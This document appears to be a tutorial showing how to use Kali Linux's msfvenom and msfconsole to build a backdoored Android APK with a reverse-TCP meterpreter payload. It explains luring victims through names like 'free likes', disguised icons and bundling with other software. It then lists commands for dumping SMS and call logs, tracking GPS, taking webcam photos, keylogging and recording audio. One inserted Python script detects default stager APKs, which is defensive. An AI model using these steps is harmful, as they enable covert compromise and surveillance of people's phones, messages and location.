
Kali Linux uses MSF to hack into Android phones

1. What is msfvenom
msfvenom is Metasploit's standalone payload generator and the replacement for msfpayload and msfencode. It is the tool used to generate backdoor payloads.
msfvenom combines msfpayload and msfencode into a single framework instance. Since June 8, 2015, msfvenom has replaced both msfpayload and msfencode.

Demo environment
Demo operation with Kali 2021.3
Target machine: MEmu Android 7.1.2 emulator
Software: msfvenom, msfconsole (built-in in Kali system)

2. Infiltration process
1. Enter administrator mode
Command: sudo su
Explanation: If you are not running as root, some commands may fail with an insufficient-permissions error. To avoid this, run the following commands as root.

Tip: After executing the command, enter the Kali password. The password is not echoed, so just type it and press Enter.

2. Generate an executable Trojan file
Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<local ip> LPORT=<local port number> R > <file name>.apk
Example: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
Explanation: For the local IP, use your own Kali machine's IP address, which you can check with ifconfig.
The local port can be any port number that is not already in use. If the port is occupied, file generation fails; change the port number and run the command again.
You can use any file name you like, for example a name that sounds like "free likes", which may make it easier for the target host to take the bait.

This is the IP address of the Kali host

Next run the command to generate a Trojan


The default generated files are in the root directory


Put the Android backdoor just generated into the target machine

3. Run the msfconsole command
Command: msfconsole


4. Configuration parameters
(1) Command: use exploit/multi/handler (select the handler module)
(2) Command: set payload android/meterpreter/reverse_tcp (select the payload, matching the one used to generate the file)
(3) Command: set LHOST 192.168.32.1 (fill in the IP address of your own host)
(4) Command: set LPORT 5555 (fill in the port number used when the file was generated)
(5) Command: show options (view the configured parameters)
(6) Command: exploit -z -j (run the handler as a background job)

After the parameters are set, execute the command in step 6 and then open the program on the target machine. You can also simply enter exploit to start the handler. As long as the backdoor has been installed on the target machine, it does not matter how it was installed: running it is enough to start the session.

Detailed attack configuration parameter demonstration:

Now wait for the target machine to open the APP

5. Open the executable file on the target machine


We can also disguise this program, change its icon, or bundle it with other software, so that when the user opens it, it is installed automatically on the other party's computer.

6. View users
(1) Command: sessions (view hooked users)
(2) Command: sessions -i 1 (select the user to attack)


Once the meterpreter prompt appears, the session has been established successfully.
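From the defender's side, the procedure above leaves a recognisable artefact: an APK built from the unmodified msfvenom template carries the default com.metasploit.stage class names in classes.dex and requests the permissions needed for dump_sms, dump_calllog, geolocate and webcam_snap. The following triage script is an added example, not part of the original post or of Metasploit; the class descriptors and the "four or more sensitive permissions" threshold are assumptions, and the sample APK it scans is constructed inline (it is a zip shaped like an APK, not a real one).

```python
import io
import re
import zipfile

# Class descriptors present in the unmodified msfvenom Android template
# (assumption: the default com.metasploit.stage package has not been renamed).
STAGER_MARKERS = [
    b"Lcom/metasploit/stage/Payload;",
    b"Lcom/metasploit/stage/MainActivity;",
]
# Permissions the payload needs for the commands shown in this walkthrough.
SENSITIVE_PERMISSIONS = [
    b"android.permission.READ_SMS",
    b"android.permission.READ_CALL_LOG",
    b"android.permission.ACCESS_FINE_LOCATION",
    b"android.permission.CAMERA",
    b"android.permission.RECORD_AUDIO",
]

def scan_apk(apk_bytes: bytes) -> dict:
    """Report stager class markers and sensitive permissions found in an APK.

    classes.dex stores class descriptors as plain modified-UTF-8 strings, so a
    byte search finds the default stager classes. The binary manifest's string
    pool is UTF-8 or UTF-16LE, so permission names are checked in both forms.
    """
    found = {"stager_classes": [], "permissions": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        dex = b"".join(z.read(n) for n in sorted(names) if re.fullmatch(r"classes\d*\.dex", n))
        manifest = z.read("AndroidManifest.xml") if "AndroidManifest.xml" in names else b""
    for marker in STAGER_MARKERS:
        if marker in dex:
            found["stager_classes"].append(marker.decode())
    for perm in SENSITIVE_PERMISSIONS:
        if perm in manifest or perm.decode().encode("utf-16-le") in manifest:
            found["permissions"].append(perm.decode())
    return found

def is_likely_msf_stager(apk_bytes: bytes) -> bool:
    """Flag the APK if a stager class is present or it asks for most sensitive permissions."""
    result = scan_apk(apk_bytes)
    return bool(result["stager_classes"]) or len(result["permissions"]) >= 4

def build_sample_apk(stager: bool = True) -> bytes:
    """Constructed sample: a minimal zip shaped like an APK (not a real one)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        dex = b"dex\n035\0" + (b"Lcom/metasploit/stage/Payload;\0" if stager else b"Lcom/example/Hello;\0")
        z.writestr("classes.dex", dex)
        perm = "android.permission.READ_SMS" if stager else "android.permission.INTERNET"
        z.writestr("AndroidManifest.xml", perm.encode("utf-16-le"))
    return buf.getvalue()
```

Run scan_apk on a real APK by reading the file into bytes; a renamed package defeats the class-marker check, which is why the permission count is kept as a second signal.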

3. Meterpreter commands for an Android phone
1. Check the phone system information of the other party
Command: sysinfo


2. Check which app files are installed on the other party’s mobile phone
Command: app_list

3. Remotely control the other party’s mobile phone to take a photo
Command: webcam_snap

4. Remotely control the other party’s mobile phone to start video chat
Command: webcam_chat

5. Dump the SMS messages stored on the other party's mobile phone
Command: dump_sms


6. Obtain the call log of the other party's mobile phone
Command: dump_calllog


7. Obtain the GPS location of the other party’s mobile phone in real time
Command: geolocate


8. More commands
You can also view the built-in help documentation with the help command.

File system commands:
cat         read the contents of a file to the screen
cd          change directory
checksum    retrieve the checksum of a file
cp          copy source to destination
del         delete the specified file
dir         list files (alias for ls)
download    download a file or directory
edit        edit a file
getlwd      print the local working directory
getwd       print the working directory
lcd         change the local working directory
lls         list local files
lpwd        print the local working directory
ls          list files
mkdir       create a directory
mv          move source to destination
pwd         print the working directory
rm          delete the specified file
rmdir       delete a directory
search      search for files
show_mount  list all mount points/logical drives
upload      upload a file or directory
pkill       kill a process by name

Meterpreter commands:
keyscan_start   start capturing keystrokes (start keylogging)
keyscan_dump    dump the keystroke buffer (retrieve keylogger output)
keyscan_stop    stop capturing keystrokes (stop keylogging)
record_mic      record audio from the default microphone for X seconds (audio recording)
webcam_chat     start a video chat (the other party will see a pop-up window)
webcam_list     list webcams (view the camera list)
webcam_snap     take a snapshot from the specified webcam (take a picture with the camera)
webcam_stream   play the video stream from the specified webcam (enable camera monitoring)
enumdesktops    list all accessible desktops and window stations
getdesktop      get the current Meterpreter desktop
setdesktop      change Meterpreter's current desktop
reboot          reboot the remote computer
shutdown        shut down the remote computer
shell           drop into the system command shell
idletime        return the number of seconds the remote user has been idle
keyboard_send   send keystrokes
keyevent        send a key event
mouse           send mouse events
screenshare     watch the remote user's desktop in real time
screenshot      take a screenshot of the interactive desktop
uictl           control some user interface components
play            play a wave audio file (.wav) on the target system
getsystem       attempt to elevate your privileges to those of the local system
execute -f notepad   open Notepad

To upload a file to the target machine, use the upload command.

To download a file from the target to the host, use the download command.